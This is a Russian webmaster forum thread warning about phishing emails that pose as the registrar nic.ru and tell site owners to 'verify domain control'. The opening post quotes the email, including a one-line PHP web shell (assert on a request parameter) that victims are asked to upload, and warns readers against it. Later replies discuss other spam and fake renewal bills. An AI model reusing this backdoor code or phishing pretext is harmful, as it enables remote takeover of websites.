Взлом сайтов от имени регистраторов доменов - Форум успешных вебмастеров - GoFuckBiz.com
 
 
Форум успешных вебмастеров - GoFuckBiz.com

  Форум успешных вебмастеров - GoFuckBiz.com > Бизнес-решения > Домены и регистраторы
Дата
USD/RUB75.4518
BTC/USD0.0000
Домены и регистраторы Обсуждаем вопросы доменов и регистраторов.

Закрытая тема
Опции темы Опции просмотра
Старый 23.12.2016, 20:21   #1
precautions
Senior Member
 
Регистрация: 01.08.2016
Сообщений: 1,332
Бабло: $155245
По умолчанию Взлом сайтов от имени регистраторов доменов

В последние 2 дня активизировались хакеры, использующие старый, как дерьмо мамонта, трюк - письмо с поддельным адресом отправителя.

Рассылаются письма от имени nic.ru и <[email protected]l.ru> - красным выделена левая буква, которой не будет видно в html-коде письма:
Цитата:
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом *****.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a7odfa980f11ce6.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[R01]));
?>

Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 30 декабря 2016 года, 22:00 (UTC+04:00), в противном случае процедура подтверждения не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
То есть, предлагают самому себе на сайте сделать бэкдор. Наивно, но на всякий случай - не ведитесь.

PS: Похоже, рассылка идёт по доменам в алфавитном порядке, пока ещё работают по букве "a".
precautions вне форума  
Старый 23.12.2016, 22:32   #2
Zork
Senior Member
 
Регистрация: 21.06.2013
Сообщений: 472
Бабло: $91053
По умолчанию

Такой фигни нет, но пару раз в месяц приходят письма, мол пытаются сбросить пароль. На невнимательность надеются что ли? Было бы чего там тырить, все давно заброшено
Zork вне форума  
Старый 23.12.2016, 22:38   #3
веломан
сыроед
 
Аватар для веломан
 
Регистрация: 01.10.2015
Сообщений: 12,353
Бабло: $1447485
По умолчанию

меня лично заебали спамить pdf-ками буржуйскими с какими-то там отчётами, счетами итп
веломан вне форума  
Старый 23.12.2016, 22:52   #4
Kludge
Где карта, Билли?
 
Аватар для Kludge
 
Регистрация: 01.12.2016
Сообщений: 475
Бабло: $57555
По умолчанию

Цитата:
Сообщение от веломан Посмотреть сообщение
меня лично заебали спамить pdf-ками буржуйскими с какими-то там отчётами, счетами итп
В фильме Кибер ясно показано, что это за pdf-ки. Сцена с сотрудником АНБ, где-то в середине фильма.
Kludge вне форума  
Старый 24.12.2016, 00:15   #5
JetD
Domains from $0.59!
 
Аватар для JetD
 
Регистрация: 21.07.2009
Сообщений: 1,486
Бабло: $175560
По умолчанию

Да, все новое - хорошо забытое старое. И судя по комментам в домейнерских группах в фейсбуках, находятся те, кто на это ведутся.
__________________
Домены от $0.59 для любой тематики: 500+ зон, free GDPR Protect, 20+ способов оплаты (Visa/MC/WM/Qiwi/ЯД/ADVcash/bitcoin/Tether/Zcash/e-banking/etc.), и 10 лет стабильной работы!
JetD вне форума  
Старый 24.12.2016, 02:03   #6
excl
Senior Member
 
Аватар для excl
 
Регистрация: 24.06.2007
Сообщений: 3,995
Бабло: $3489651
По умолчанию

Kludge, посмотрел трейлер - фигня какая-то, боевик обычный. Так как там трактуют пдфки?
excl вне форума  
Старый 24.12.2016, 06:00   #7
Skyworker
Senior Member
 
Регистрация: 25.12.2013
Сообщений: 4,309
Бабло: $510525
По умолчанию

Прикольный разводняк, будем иметь ввиду.
Skyworker вне форума  
Старый 24.12.2016, 06:59   #8
Kludge
Где карта, Билли?
 
Аватар для Kludge
 
Регистрация: 01.12.2016
Сообщений: 475
Бабло: $57555
По умолчанию

excl, ну не совсем обычный. Про хакеров кино. В pdf-ке, что подсунули анбэшнику был клавиатурный шпион от супер секретной программы. Посмотри, неплохой фильм.
Kludge вне форума  
Старый 24.12.2016, 09:42   #9
DimaX
Senior Member
 
Регистрация: 19.04.2007
Сообщений: 2,367
Бабло: $307765
По умолчанию

Уже пара недель, как идет такая рассылка типа от РуЦентра, даже сам РуЦентр разослал уже предупреждения о ней, мне на пару мыл приходило.

Причем оформлено мыло охеренно, с 1-го взгляда и не поймешь, что это фейк, пока непосредственно в текст не вчитаешься.

А если юзер не шарит (коих большинство), то запросто поведется, блин.
DimaX вне форума  
Старый 26.12.2016, 13:30   #10
kitvit
Юниор
 
Аватар для kitvit
 
Регистрация: 02.08.2013
Сообщений: 10
Бабло: $2060
По умолчанию

Мне непрерывно льётся говно с ссылками на оплату (.com .net .org) доменов. Смотрят адреса во whois и шлют письма на продление. Идёт рассчёт на идиота. Думаю что находятся такие что оплачивают. Большинство обывателей понятия не имеют от кого пришло письмо, а больше половины не помнят где регистрировали домен и будут рады кликнуть по ссылке куда нужно ввести только свою карточку для пополнения домена. Видимо это как-то так работает.
__________________
Админю, лужу, паяю, ЭВМ починяю.
kitvit вне форума